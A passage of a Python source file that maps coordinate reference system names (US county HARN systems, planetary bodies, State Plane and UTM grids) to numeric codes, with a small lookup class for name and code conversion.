104709, 'GCS_NAD_1983_HARN_Adj_MN_Cass_North': 104710, 'GCS_NAD_1983_HARN_Adj_MN_Cass_South': 104711, 'GCS_NAD_1983_HARN_Adj_MN_Chippewa': 104712, 'GCS_NAD_1983_HARN_Adj_MN_Chisago': 104713, 'GCS_NAD_1983_HARN_Adj_MN_Cook_North': 104714, 'GCS_NAD_1983_HARN_Adj_MN_Cook_South': 104715, 'GCS_NAD_1983_HARN_Adj_MN_Cottonwood': 104716, 'GCS_NAD_1983_HARN_Adj_MN_Crow_Wing': 104717, 'GCS_NAD_1983_HARN_Adj_MN_Dakota': 104718, 'GCS_NAD_1983_HARN_Adj_MN_Dodge': 104719, 'GCS_NAD_1983_HARN_Adj_MN_Douglas': 104720, 'GCS_NAD_1983_HARN_Adj_MN_Faribault': 104721, 'GCS_NAD_1983_HARN_Adj_MN_Fillmore': 104722, 'GCS_NAD_1983_HARN_Adj_MN_Freeborn': 104723, 'GCS_NAD_1983_HARN_Adj_MN_Goodhue': 104724, 'GCS_NAD_1983_HARN_Adj_MN_Grant': 104725, 'GCS_NAD_1983_HARN_Adj_MN_Hennepin': 104726, 'GCS_NAD_1983_HARN_Adj_MN_Houston': 104727, 'GCS_NAD_1983_HARN_Adj_MN_Isanti': 104728, 
'GCS_NAD_1983_HARN_Adj_MN_Itasca_North': 104729, 'GCS_NAD_1983_HARN_Adj_MN_Itasca_South': 104730, 'GCS_NAD_1983_HARN_Adj_MN_Jackson': 104731, 'GCS_NAD_1983_HARN_Adj_MN_Kanabec': 104732, 'GCS_NAD_1983_HARN_Adj_MN_Kandiyohi': 104733, 'GCS_NAD_1983_HARN_Adj_MN_Kittson': 104734, 'GCS_NAD_1983_HARN_Adj_MN_Koochiching': 104735, 'GCS_NAD_1983_HARN_Adj_MN_Lac_Qui_Parle': 104736, 'GCS_NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_North': 104737, 'GCS_NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_South': 104738, 'GCS_NAD_1983_HARN_Adj_MN_Le_Sueur': 104739, 'GCS_NAD_1983_HARN_Adj_MN_Lincoln': 104740, 'GCS_NAD_1983_HARN_Adj_MN_Lyon': 104741, 'GCS_NAD_1983_HARN_Adj_MN_McLeod': 104742, 'GCS_NAD_1983_HARN_Adj_MN_Mahnomen': 104743, 'GCS_NAD_1983_HARN_Adj_MN_Marshall': 104744, 'GCS_NAD_1983_HARN_Adj_MN_Martin': 104745, 'GCS_NAD_1983_HARN_Adj_MN_Meeker': 104746, 'GCS_NAD_1983_HARN_Adj_MN_Morrison': 104747, 'GCS_NAD_1983_HARN_Adj_MN_Mower': 104748, 'GCS_NAD_1983_HARN_Adj_MN_Murray': 104749, 'GCS_NAD_1983_HARN_Adj_MN_Nicollet': 104750, 'GCS_NAD_1983_HARN_Adj_MN_Nobles': 104751, 'GCS_NAD_1983_HARN_Adj_MN_Norman': 104752, 'GCS_NAD_1983_HARN_Adj_MN_Olmsted': 104753, 'GCS_NAD_1983_HARN_Adj_MN_Ottertail': 104754, 'GCS_NAD_1983_HARN_Adj_MN_Pennington': 104755, 'GCS_NAD_1983_HARN_Adj_MN_Pine': 104756, 'GCS_NAD_1983_HARN_Adj_MN_Pipestone': 104757, 'GCS_NAD_1983_HARN_Adj_MN_Polk': 104758, 'GCS_NAD_1983_HARN_Adj_MN_Pope': 104759, 'GCS_NAD_1983_HARN_Adj_MN_Ramsey': 104760, 'GCS_NAD_1983_HARN_Adj_MN_Red_Lake': 104761, 'GCS_NAD_1983_HARN_Adj_MN_Redwood': 104762, 'GCS_NAD_1983_HARN_Adj_MN_Renville': 104763, 'GCS_NAD_1983_HARN_Adj_MN_Rice': 104764, 'GCS_NAD_1983_HARN_Adj_MN_Rock': 104765, 'GCS_NAD_1983_HARN_Adj_MN_Roseau': 104766, 'GCS_NAD_1983_HARN_Adj_MN_St_Louis_North': 104767, 'GCS_NAD_1983_HARN_Adj_MN_St_Louis_Central': 104768, 'GCS_NAD_1983_HARN_Adj_MN_St_Louis_South': 104769, 'GCS_NAD_1983_HARN_Adj_MN_Scott': 104770, 'GCS_NAD_1983_HARN_Adj_MN_Sherburne': 104771, 'GCS_NAD_1983_HARN_Adj_MN_Sibley': 104772, 
'GCS_NAD_1983_HARN_Adj_MN_Stearns': 104773, 'GCS_NAD_1983_HARN_Adj_MN_Steele': 104774, 'GCS_NAD_1983_HARN_Adj_MN_Stevens': 104775, 'GCS_NAD_1983_HARN_Adj_MN_Swift': 104776, 'GCS_NAD_1983_HARN_Adj_MN_Todd': 104777, 'GCS_NAD_1983_HARN_Adj_MN_Traverse': 104778, 'GCS_NAD_1983_HARN_Adj_MN_Wabasha': 104779, 'GCS_NAD_1983_HARN_Adj_MN_Wadena': 104780, 'GCS_NAD_1983_HARN_Adj_MN_Waseca': 104781, 'GCS_NAD_1983_HARN_Adj_MN_Watonwan': 104782, 'GCS_NAD_1983_HARN_Adj_MN_Winona': 104783, 'GCS_NAD_1983_HARN_Adj_MN_Wright': 104784, 'GCS_NAD_1983_HARN_Adj_MN_Yellow_Medicine': 104785, 'GCS_NAD_1983_HARN_Adj_WI_Adams': 104800, 'GCS_NAD_1983_HARN_Adj_WI_Ashland': 104801, 'GCS_NAD_1983_HARN_Adj_WI_Barron': 104802, 'GCS_NAD_1983_HARN_Adj_WI_Bayfield': 104803, 'GCS_NAD_1983_HARN_Adj_WI_Brown': 104804, 'GCS_NAD_1983_HARN_Adj_WI_Buffalo': 104805, 'GCS_NAD_1983_HARN_Adj_WI_Burnett': 104806, 'GCS_NAD_1983_HARN_Adj_WI_Calumet': 104807, 'GCS_NAD_1983_HARN_Adj_WI_Chippewa': 104808, 'GCS_NAD_1983_HARN_Adj_WI_Clark': 104809, 'GCS_NAD_1983_HARN_Adj_WI_Columbia': 104810, 'GCS_NAD_1983_HARN_Adj_WI_Crawford': 104811, 'GCS_NAD_1983_HARN_Adj_WI_Dane': 104812, 'GCS_NAD_1983_HARN_Adj_WI_Dodge': 104813, 'GCS_NAD_1983_HARN_Adj_WI_Door': 104814, 'GCS_NAD_1983_HARN_Adj_WI_Douglas': 104815, 'GCS_NAD_1983_HARN_Adj_WI_Dunn': 104816, 'GCS_NAD_1983_HARN_Adj_WI_EauClaire': 104817, 'GCS_NAD_1983_HARN_Adj_WI_Florence': 104818, 'GCS_NAD_1983_HARN_Adj_WI_FondduLac': 104819, 'GCS_NAD_1983_HARN_Adj_WI_Forest': 104820, 'GCS_NAD_1983_HARN_Adj_WI_Grant': 104821, 'GCS_NAD_1983_HARN_Adj_WI_Green': 104822, 'GCS_NAD_1983_HARN_Adj_WI_GreenLake': 104823, 'GCS_NAD_1983_HARN_Adj_WI_Iowa': 104824, 'GCS_NAD_1983_HARN_Adj_WI_Iron': 104825, 'GCS_NAD_1983_HARN_Adj_WI_Jackson': 104826, 'GCS_NAD_1983_HARN_Adj_WI_Jefferson': 104827, 'GCS_NAD_1983_HARN_Adj_WI_Juneau': 104828, 'GCS_NAD_1983_HARN_Adj_WI_Kenosha': 104829, 'GCS_NAD_1983_HARN_Adj_WI_Kewaunee': 104830, 'GCS_NAD_1983_HARN_Adj_WI_LaCrosse': 104831, 
'GCS_NAD_1983_HARN_Adj_WI_Lafayette': 104832, 'GCS_NAD_1983_HARN_Adj_WI_Langlade': 104833, 'GCS_NAD_1983_HARN_Adj_WI_Lincoln': 104834, 'GCS_NAD_1983_HARN_Adj_WI_Manitowoc': 104835, 'GCS_NAD_1983_HARN_Adj_WI_Marathon': 104836, 'GCS_NAD_1983_HARN_Adj_WI_Marinette': 104837, 'GCS_NAD_1983_HARN_Adj_WI_Marquette': 104838, 'GCS_NAD_1983_HARN_Adj_WI_Menominee': 104839, 'GCS_NAD_1983_HARN_Adj_WI_Milwaukee': 104840, 'GCS_NAD_1983_HARN_Adj_WI_Monroe': 104841, 'GCS_NAD_1983_HARN_Adj_WI_Oconto': 104842, 'GCS_NAD_1983_HARN_Adj_WI_Oneida': 104843, 'GCS_NAD_1983_HARN_Adj_WI_Outagamie': 104844, 'GCS_NAD_1983_HARN_Adj_WI_Ozaukee': 104845, 'GCS_NAD_1983_HARN_Adj_WI_Pepin': 104846, 'GCS_NAD_1983_HARN_Adj_WI_Pierce': 104847, 'GCS_NAD_1983_HARN_Adj_WI_Polk': 104848, 'GCS_NAD_1983_HARN_Adj_WI_Portage': 104849, 'GCS_NAD_1983_HARN_Adj_WI_Price': 104850, 'GCS_NAD_1983_HARN_Adj_WI_Racine': 104851, 'GCS_NAD_1983_HARN_Adj_WI_Richland': 104852, 'GCS_NAD_1983_HARN_Adj_WI_Rock': 104853, 'GCS_NAD_1983_HARN_Adj_WI_Rusk': 104854, 'GCS_NAD_1983_HARN_Adj_WI_StCroix': 104855, 'GCS_NAD_1983_HARN_Adj_WI_Sauk': 104856, 'GCS_NAD_1983_HARN_Adj_WI_Sawyer': 104857, 'GCS_NAD_1983_HARN_Adj_WI_Shawano': 104858, 'GCS_NAD_1983_HARN_Adj_WI_Sheboygan': 104859, 'GCS_NAD_1983_HARN_Adj_WI_Taylor': 104860, 'GCS_NAD_1983_HARN_Adj_WI_Trempealeau': 104861, 'GCS_NAD_1983_HARN_Adj_WI_Vernon': 104862, 'GCS_NAD_1983_HARN_Adj_WI_Vilas': 104863, 'GCS_NAD_1983_HARN_Adj_WI_Walworth': 104864, 'GCS_NAD_1983_HARN_Adj_WI_Washburn': 104865, 'GCS_NAD_1983_HARN_Adj_WI_Washington': 104866, 'GCS_NAD_1983_HARN_Adj_WI_Waukesha': 104867, 'GCS_NAD_1983_HARN_Adj_WI_Waupaca': 104868, 'GCS_NAD_1983_HARN_Adj_WI_Waushara': 104869, 'GCS_NAD_1983_HARN_Adj_WI_Winnebago': 104870, 'GCS_NAD_1983_HARN_Adj_WI_Wood': 104871, 'GCS_Mercury_2000': 104900, 'GCS_Venus_1985': 104901, 'GCS_Venus_2000': 104902, 'GCS_Moon_2000': 104903, 'GCS_Mars_1979': 104904, 'GCS_Mars_2000': 104905, 'GCS_Deimos_2000': 104906, 'GCS_Phobos_2000': 104907, 'GCS_Jupiter_2000': 104908, 
'GCS_Adrastea_2000': 104909, 'GCS_Amalthea_2000': 104910, 'GCS_Ananke_2000': 104911, 'GCS_Callisto_2000': 104912, 'GCS_Carme_2000': 104913, 'GCS_Elara_2000': 104914, 'GCS_Europa_2000': 104915, 'GCS_Ganymede_2000': 104916, 'GCS_Himalia_2000': 104917, 'GCS_Io_2000': 104918, 'GCS_Leda_2000': 104919, 'GCS_Lysithea_2000': 104920, 'GCS_Metis_2000': 104921, 'GCS_Pasiphae_2000': 104922, 'GCS_Sinope_2000': 104923, 'GCS_Thebe_2000': 104924, 'GCS_Saturn_2000': 104925, 'GCS_Atlas_2000': 104926, 'GCS_Calypso_2000': 104927, 'GCS_Dione_2000': 104928, 'GCS_Enceladus_2000': 104929, 'GCS_Epimetheus_2000': 104930, 'GCS_Helene_2000': 104931, 'GCS_Hyperion_2000': 104932, 'GCS_Iapetus_2000': 104933, 'GCS_Janus_2000': 104934, 'GCS_Mimas_2000': 104935, 'GCS_Pan_2000': 104936, 'GCS_Pandora_2000': 104937, 'GCS_Phoebe_2000': 104938, 'GCS_Prometheus_2000': 104939, 'GCS_Rhea_2000': 104940, 'GCS_Telesto_2000': 104941, 'GCS_Tethys_2000': 104942, 'GCS_Titan_2000': 104943, 'GCS_Uranus_2000': 104944, 'GCS_Ariel_2000': 104945, 'GCS_Belinda_2000': 104946, 'GCS_Bianca_2000': 104947, 'GCS_Cordelia_2000': 104948, 'GCS_Cressida_2000': 104949, 'GCS_Desdemona_2000': 104950, 'GCS_Juliet_2000': 104951, 'GCS_Miranda_2000': 104952, 'GCS_Oberon_2000': 104953, 'GCS_Ophelia_2000': 104954, 'GCS_Portia_2000': 104955, 'GCS_Puck_2000': 104956, 'GCS_Rosalind_2000': 104957, 'GCS_Titania_2000': 104958, 'GCS_Umbriel_2000': 104959, 'GCS_Neptune_2000': 104960, 'GCS_Despina_2000': 104961, 'GCS_Galatea_2000': 104962, 'GCS_Larissa_2000': 104963, 'GCS_Naiad_2000': 104964, 'GCS_Nereid_2000': 104965, 'GCS_Proteus_2000': 104966, 'GCS_Thalassa_2000': 104967, 'GCS_Triton_2000': 104968, 'GCS_Pluto_2000': 104969, 'GCS_Charon_2000': 104970 } geographic = geographic() projected = projected()
import os class Projection(object): def __init__(self): self._name_mapping = {} for key, val in self._projections.items(): self._name_mapping[int(val)] = key setattr(self, key.replace('-', '_'), val) def __getitem__(self, index): return self._name_mapping[int(index)] def __contains__(self, index): return index in self._name_mapping class projected(Projection): _projections = { 'Anguilla_1957_British_West_Indies_Grid': 2000, 'Antigua_1943_British_West_Indies_Grid': 2001, 'Dominica_1945_British_West_Indies_Grid': 2002, 'Grenada_1953_British_West_Indies_Grid': 2003, 'Montserrat_1958_British_West_Indies_Grid': 2004, 'St_Kitts_1955_British_West_Indies_Grid': 2005, 'St_Lucia_1955_British_West_Indies_Grid': 2006, 'St_Vincent_1945_British_West_Indies_Grid': 2007, 'NAD_1927_CGQ77_MTM_2_SCoPQ': 2008, 'NAD_1927_CGQ77_MTM_3_SCoPQ': 2009, 'NAD_1927_CGQ77_MTM_4_SCoPQ': 2010, 'NAD_1927_CGQ77_MTM_5_SCoPQ': 2011, 'NAD_1927_CGQ77_MTM_6_SCoPQ': 2012, 'NAD_1927_CGQ77_MTM_7_SCoPQ': 2013, 'NAD_1927_CGQ77_MTM_8_SCoPQ': 2014, 'NAD_1927_CGQ77_MTM_9_SCoPQ': 2015, 'NAD_1927_CGQ77_MTM_10_SCoPQ': 2016, 'NAD_1927_DEF_1976_MTM_8': 2017, 'NAD_1927_DEF_1976_MTM_9': 2018, 'NAD_1927_DEF_1976_MTM_10': 2019, 'NAD_1927_DEF_1976_MTM_11': 2020, 'NAD_1927_DEF_1976_MTM_12': 2021, 'NAD_1927_DEF_1976_MTM_13': 2022, 'NAD_1927_DEF_1976_MTM_14': 2023, 'NAD_1927_DEF_1976_MTM_15': 2024, 'NAD_1927_DEF_1976_MTM_16': 2025, 'NAD_1927_DEF_1976_MTM_17': 2026, 'NAD_1927_DEF_1976_UTM_Zone_15N': 2027, 'NAD_1927_DEF_1976_UTM_Zone_16N': 2028, 'NAD_1927_DEF_1976_UTM_Zone_17N': 2029, 'NAD_1927_DEF_1976_UTM_Zone_18N': 2030, 'NAD_1927_CGQ77_UTM_Zone_17N': 2031, 'NAD_1927_CGQ77_UTM_Zone_18N': 2032, 'NAD_1927_CGQ77_UTM_Zone_19N': 2033, 'NAD_1927_CGQ77_UTM_Zone_20N': 2034, 'NAD_1927_CGQ77_UTM_Zone_21N': 2035, 'NAD_1983_CSRS_New_Brunswick_Stereographic': 2036, 'NAD_1983_CSRS_UTM_Zone_19N': 2037, 'NAD_1983_CSRS_UTM_Zone_20N': 2038, 'Israel_TM_Grid': 2039, 'Locodjo_1965_UTM_Zone_30N': 2040, 'Abidjan_1987_UTM_Zone_30N': 2041, 
'Locodjo_1965_UTM_Zone_29N': 2042, 'Abidjan_1987_UTM_Zone_29N': 2043, 'Hanoi_1972_GK_Zone_18': 2044, 'Hanoi_1972_GK_Zone_19': 2045, 'CH1903+_LV95': 2056, 'Rassadiran_Nakhl_e_Taqi': 2057, 'ED_1950_ED77_UTM_Zone_38N': 2058, 'ED_1950_ED77_UTM_Zone_39N': 2059, 'ED_1950_ED77_UTM_Zone_40N': 2060, 'ED_1950_ED77_UTM_Zone_41N': 2061, 'Madrid_1870_Madrid_Spain': 2062, 'Dabola_1981_UTM_Zone_28N': 2063, 'Dabola_1981_UTM_Zone_29N': 2064, 'S-JTSK_Ferro_Krovak': 2065, 'Mount_Dillon_Tobago_Grid': 2066, 'Naparima_1955_UTM_Zone_20N': 2067, 'ELD_1979_Libya_5': 2068, 'ELD_1979_Libya_6': 2069, 'ELD_1979_Libya_7': 2070, 'ELD_1979_Libya_8': 2071, 'ELD_1979_Libya_9': 2072, 'ELD_1979_Libya_10': 2073, 'ELD_1979_Libya_11': 2074, 'ELD_1979_Libya_12': 2075, 'ELD_1979_Libya_13': 2076, 'ELD_1979_UTM_Zone_32N': 2077, 'ELD_1979_UTM_Zone_33N': 2078, 'ELD_1979_UTM_Zone_34N': 2079, 'ELD_1979_UTM_Zone_35N': 2080, 'Chos_Malal_1914_Argentina_2': 2081, 'Pampa_del_Castillo_Argentina_2': 2082, 'Hito_XVIII_1963_Argentina_2': 2083, 'Hito_XVIII_1963_UTM_19S': 2084, 'NAD_1927_Cuba_Norte': 2085, 'NAD_1927_Cuba_Sur': 2086, 'ELD_1979_TM_12_NE': 2087, 'Carthage_TM_11_NE': 2088, 'Yemen_NGN_1996_UTM_Zone_38N': 2089, 'Yemen_NGN_1996_UTM_Zone_39N': 2090, 'South_Yemen_GK_Zone_8': 2091, 'South_Yemen_GK_Zone_9': 2092, 'Hanoi_1972_GK_106_NE': 2093, 'WGS_1972_BE_TM_106_NE': 2094, 'Bissau_UTM_Zone_28N': 2095, 'Korean_1985_Korea_East_Belt': 2096, 'Korean_1985_Korea_Central_Belt': 2097, 'Korean_1985_Korea_West_Belt': 2098, 'Qatar_1948_Qatar_Grid': 2099, 'Greek_Grid': 2100, 'Lake_Maracaibo_Grid_M1': 2101, 'Lake_Maracaibo_Grid': 2102, 'Lake_Maracaibo_Grid_M3': 2103, 'Lake_Maracaibo_La_Rosa_Grid': 2104, 'NZGD_2000_Mount_Eden_Circuit': 2105, 'NZGD_2000_Bay_of_Plenty_Circuit': 2106, 'NZGD_2000_Poverty_Bay_Circuit': 2107, 'NZGD_2000_Hawkes_Bay_Circuit': 2108, 'NZGD_2000_Taranaki_Circuit': 2109, 'NZGD_2000_Tuhirangi_Circuit': 2110, 'NZGD_2000_Wanganui_Circuit': 2111, 'NZGD_2000_Wairarapa_Circuit': 2112, 
'NZGD_2000_Wellington_Circuit': 2113, 'NZGD_2000_Collingwood_Circuit': 2114, 'NZGD_2000_Nelson_Circuit': 2115, 'NZGD_2000_Karamea_Circuit': 2116, 'NZGD_2000_Buller_Circuit': 2117, 'NZGD_2000_Grey_Circuit': 2118, 'NZGD_2000_Amuri_Circuit': 2119, 'NZGD_2000_Marlborough_Circuit': 2120, 'NZGD_2000_Hokitika_Circuit': 2121, 'NZGD_2000_Okarito_Circuit': 2122, 'NZGD_2000_Jacksons_Bay_Circuit': 2123, 'NZGD_2000_Mount_Pleasant_Circuit': 2124, 'NZGD_2000_Gawler_Circuit': 2125, 'NZGD_2000_Timaru_Circuit': 2126, 'NZGD_2000_Lindis_Peak_Circuit': 2127, 'NZGD_2000_Mount_Nicholas_Circuit': 2128, 'NZGD_2000_Mount_York_Circuit': 2129, 'NZGD_2000_Observation_Point_Circuit': 2130, 'NZGD_2000_North_Taieri_Circuit': 2131, 'NZGD_2000_Bluff_Circuit': 2132, 'NZGD_2000_UTM_Zone_58S': 2133, 'NZGD_2000_UTM_Zone_59S': 2134, 'NZGD_2000_UTM_Zone_60S': 2135, 'Accra_Ghana_Grid': 2136, 'Accra_TM_1_NW': 2137, 'NAD_1927_CGQ77_Quebec_Lambert': 2138, 'NAD_1983_CSRS_MTM_2_SCoPQ': 2139, 'NAD_1983_CSRS_MTM_3': 2140, 'NAD_1983_CSRS_MTM_4': 2141, 'NAD_1983_CSRS_MTM_5': 2142, 'NAD_1983_CSRS_MTM_6': 2143, 'NAD_1983_CSRS_MTM_7': 2144, 'NAD_1983_CSRS_MTM_8': 2145, 'NAD_1983_CSRS_MTM_9': 2146, 'NAD_1983_CSRS_MTM_10': 2147, 'NAD_1983_CSRS_UTM_Zone_21N': 2148, 'NAD_1983_CSRS_UTM_Zone_18N': 2149, 'NAD_1983_CSRS_UTM_Zone_17N': 2150, 'NAD_1983_CSRS_UTM_Zone_13N': 2151, 'NAD_1983_CSRS_UTM_Zone_12N': 2152, 'NAD_1983_CSRS_UTM_Zone_11N': 2153, 'RGF_1993_Lambert_93': 2154, 'Samoa_1962_Samoa_Lambert': 2155, 'IRENET95_Irish_Transverse_Mercator': 2157, 'IRENET95_UTM_Zone_29N': 2158, 'Sierra_Leone_1924_New_Colony_Grid': 2159, 'Sierra_Leone_1924_New_War_Office_Grid': 2160, 'Sierra_Leone_1968_UTM_Zone_28N': 2161, 'Sierra_Leone_1968_UTM_Zone_29N': 2162, 'US_National_Atlas_Equal_Area': 2163, 'Locodjo_1965_TM_5_NW': 2164, 'Abidjan_1987_TM_5_NW': 2165, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_3': 2166, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_4': 2167, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_5': 2168, 'Luxembourg_1930_Gauss': 2169, 
'MGI_Slovenia_Grid': 2170, 'Pulkovo_1942_Adj_1958_Poland_Zone_II': 2172, 'Pulkovo_1942_Adj_1958_Poland_Zone_III': 2173, 'Pulkovo_1942_Adj_1958_Poland_Zone_IV': 2174, 'Pulkovo_1942_Adj_1958_Poland_Zone_V': 2175, 'ETRS_1989_Poland_CS2000_Zone_5': 2176, 'ETRS_1989_Poland_CS2000_Zone_6': 2177, 'ETRS_1989_Poland_CS2000_Zone_7': 2178, 'ETRS_1989_Poland_CS2000_Zone_8': 2179, 'ETRS_1989_Poland_CS92': 2180, 'ED_1950_Turkey_9': 2181, 'ED_1950_Turkey_10': 2182, 'ED_1950_Turkey_11': 2183, 'ED_1950_Turkey_12': 2184, 'ED_1950_Turkey_13': 2185, 'ED_1950_Turkey_14': 2186, 'ED_1950_Turkey_15': 2187, 'Azores_Occidental_1939_UTM_Zone_25N': 2188, 'Azores_Central_1948_UTM_Zone_26N': 2189, 'Azores_Oriental_1940_UTM_Zone_26N': 2190, 'ED_1950_France_EuroLambert': 2192, 'NZGD_2000_New_Zealand_Transverse_Mercator': 2193, 'NAD_1983_HARN_UTM_Zone_2S': 2195, 'ETRS_1989_Kp2000_Jutland': 2196, 'ETRS_1989_Kp2000_Zealand': 2197, 'ETRS_1989_Kp2000_Bornholm': 2198, 'ATS_1977_New_Brunswick_Stereographic': 2200, 'REGVEN_UTM_Zone_18N': 2201, 'REGVEN_UTM_Zone_19N': 2202, 'REGVEN_UTM_Zone_20N': 2203, 'NAD_1927_StatePlane_Tennessee_FIPS_4100': 2204, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601': 2205, 'ED_1950_3_Degree_GK_Zone_9': 2206, 'ED_1950_3_Degree_GK_Zone_10': 2207, 'ED_1950_3_Degree_GK_Zone_11': 2208, 'ED_1950_3_Degree_GK_Zone_12': 2209, 'ED_1950_3_Degree_GK_Zone_13': 2210, 'ED_1950_3_Degree_GK_Zone_14': 2211, 'ED_1950_3_Degree_GK_Zone_15': 2212, 'ETRS_1989_TM_30_NE': 2213, 'Douala_1948_AEF_West': 2214, 'Manoca_1962_UTM_Zone_32N': 2215, 'Qornoq_1927_UTM_Zone_22N': 2216, 'Qornoq_1927_UTM_Zone_23N': 2217, 'ATS_1977_UTM_Zone_19N': 2219, 'ATS_1977_UTM_Zone_20N': 2220, 'NAD_1983_StatePlane_Arizona_East_FIPS_0201_Feet_Intl': 2222, 'NAD_1983_StatePlane_Arizona_Central_FIPS_0202_Feet_Intl': 2223, 'NAD_1983_StatePlane_Arizona_West_FIPS_0203_Feet_Intl': 2224, 'NAD_1983_StatePlane_California_I_FIPS_0401_Feet': 2225, 'NAD_1983_StatePlane_California_II_FIPS_0402_Feet': 2226, 
'NAD_1983_StatePlane_California_III_FIPS_0403_Feet': 2227, 'NAD_1983_StatePlane_California_IV_FIPS_0404_Feet': 2228, 'NAD_1983_StatePlane_California_V_FIPS_0405_Feet': 2229, 'NAD_1983_StatePlane_California_VI_FIPS_0406_Feet': 2230, 'NAD_1983_StatePlane_Colorado_North_FIPS_0501_Feet': 2231, 'NAD_1983_StatePlane_Colorado_Central_FIPS_0502_Feet': 2232, 'NAD_1983_StatePlane_Colorado_South_FIPS_0503_Feet': 2233, 'NAD_1983_StatePlane_Connecticut_FIPS_0600_Feet': 2234, 'NAD_1983_StatePlane_Delaware_FIPS_0700_Feet': 2235, 'NAD_1983_StatePlane_Florida_East_FIPS_0901_Feet': 2236, 'NAD_1983_StatePlane_Florida_West_FIPS_0902_Feet': 2237, 'NAD_1983_StatePlane_Florida_North_FIPS_0903_Feet': 2238, 'NAD_1983_StatePlane_Georgia_East_FIPS_1001_Feet': 2239, 'NAD_1983_StatePlane_Georgia_West_FIPS_1002_Feet': 2240, 'NAD_1983_StatePlane_Idaho_East_FIPS_1101_Feet': 2241, 'NAD_1983_StatePlane_Idaho_Central_FIPS_1102_Feet': 2242, 'NAD_1983_StatePlane_Idaho_West_FIPS_1103_Feet': 2243, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301_Feet': 2244, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302_Feet': 2245, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601_Feet': 2246, 'NAD_1983_StatePlane_Kentucky_South_FIPS_1602_Feet': 2247, 'NAD_1983_StatePlane_Maryland_FIPS_1900_Feet': 2248, 'NAD_1983_StatePlane_Massachusetts_Mainland_FIPS_2001_Feet': 2249, 'NAD_1983_StatePlane_Massachusetts_Island_FIPS_2002_Feet': 2250, 'NAD_1983_StatePlane_Michigan_North_FIPS_2111_Feet_Intl': 2251, 'NAD_1983_StatePlane_Michigan_Central_FIPS_2112_Feet_Intl': 2252, 'NAD_1983_StatePlane_Michigan_South_FIPS_2113_Feet_Intl': 2253, 'NAD_1983_StatePlane_Mississippi_East_FIPS_2301_Feet': 2254, 'NAD_1983_StatePlane_Mississippi_West_FIPS_2302_Feet': 2255, 'NAD_1983_StatePlane_Montana_FIPS_2500_Feet_Intl': 2256, 'NAD_1983_StatePlane_New_Mexico_East_FIPS_3001_Feet': 2257, 'NAD_1983_StatePlane_New_Mexico_Central_FIPS_3002_Feet': 2258, 'NAD_1983_StatePlane_New_Mexico_West_FIPS_3003_Feet': 2259, 'NAD_1983_StatePlane_New_York_East_FIPS_3101_Feet': 
2260, 'NAD_1983_StatePlane_New_York_Central_FIPS_3102_Feet': 2261, 'NAD_1983_StatePlane_New_York_West_FIPS_3103_Feet': 2262, 'NAD_1983_StatePlane_New_York_Long_Island_FIPS_3104_Feet': 2263, 'NAD_1983_StatePlane_North_Carolina_FIPS_3200_Feet': 2264, 'NAD_1983_StatePlane_North_Dakota_North_FIPS_3301_Feet_Intl': 2265, 'NAD_1983_StatePlane_North_Dakota_South_FIPS_3302_Feet_Intl': 2266, 'NAD_1983_StatePlane_Oklahoma_North_FIPS_3501_Feet': 2267, 'NAD_1983_StatePlane_Oklahoma_South_FIPS_3502_Feet': 2268, 'NAD_1983_StatePlane_Oregon_North_FIPS_3601_Feet_Intl': 2269, 'NAD_1983_StatePlane_Oregon_South_FIPS_3602_Feet_Intl': 2270, 'NAD_1983_StatePlane_Pennsylvania_North_FIPS_3701_Feet': 2271, 'NAD_1983_StatePlane_Pennsylvania_South_FIPS_3702_Feet': 2272, 'NAD_1983_StatePlane_South_Carolina_FIPS_3900_Feet_Intl': 2273, 'NAD_1983_StatePlane_Tennessee_FIPS_4100_Feet': 2274, 'NAD_1983_StatePlane_Texas_North_FIPS_4201_Feet': 2275, 'NAD_1983_StatePlane_Texas_North_Central_FIPS_4202_Feet': 2276, 'NAD_1983_StatePlane_Texas_Central_FIPS_4203_Feet': 2277, 'NAD_1983_StatePlane_Texas_South_Central_FIPS_4204_Feet': 2278, 'NAD_1983_StatePlane_Texas_South_FIPS_4205_Feet': 2279, 'NAD_1983_StatePlane_Utah_North_FIPS_4301_Feet_Intl': 2280, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302_Feet_Intl': 2281, 'NAD_1983_StatePlane_Utah_South_FIPS_4303_Feet_Intl': 2282, 'NAD_1983_StatePlane_Virginia_North_FIPS_4501_Feet': 2283, 'NAD_1983_StatePlane_Virginia_South_FIPS_4502_Feet': 2284, 'NAD_1983_StatePlane_Washington_North_FIPS_4601_Feet': 2285, 'NAD_1983_StatePlane_Washington_South_FIPS_4602_Feet': 2286, 'NAD_1983_StatePlane_Wisconsin_North_FIPS_4801_Feet': 2287, 'NAD_1983_StatePlane_Wisconsin_Central_FIPS_4802_Feet': 2288, 'NAD_1983_StatePlane_Wisconsin_South_FIPS_4803_Feet': 2289, 'Prince_Edward_Island_Stereographic': 2290, 'NAD_1983_CSRS_Prince_Edward_Island': 2291, 'NAD_1983_CSRS_Prince_Edward_Island': 2292, 'ATS_1977_MTM_4_Nova_Scotia': 2294, 'ATS_1977_MTM_5_Nova_Scotia': 2295, 'Batavia_TM_109_SE': 
2308, 'WGS_1984_TM_116_SE': 2309, 'WGS_1984_TM_132_SE': 2310, 'WGS_1984_TM_6_NE': 2311, 'Garoua_UTM_Zone_33N': 2312, 'Kousseri_UTM_Zone_33N': 2313, 'Trinidad_1903_Trinidad_Grid_Feet_Clarke': 2314, 'Campo_Inchauspe_UTM_19S': 2315, 'Campo_Inchauspe_UTM_20S': 2316, 'PSAD_1956_ICN_Regional': 2317, 'Ain_el_Abd_Aramco_Lambert': 2318, 'ED_1950_TM27': 2319, 'ED_1950_TM30': 2320, 'ED_1950_TM33': 2321, 'ED_1950_TM36': 2322, 'ED_1950_TM39': 2323, 'ED_1950_TM42': 2324, 'ED_1950_TM45': 2325, 'Hong_Kong_1980_Grid': 2326, 'Xian_1980_GK_Zone_13': 2327, 'Xian_1980_GK_Zone_14': 2328, 'Xian_1980_GK_Zone_15': 2329, 'Xian_1980_GK_Zone_16': 2330, 'Xian_1980_GK_Zone_17': 2331, 'Xian_1980_GK_Zone_18': 2332, 'Xian_1980_GK_Zone_19': 2333, 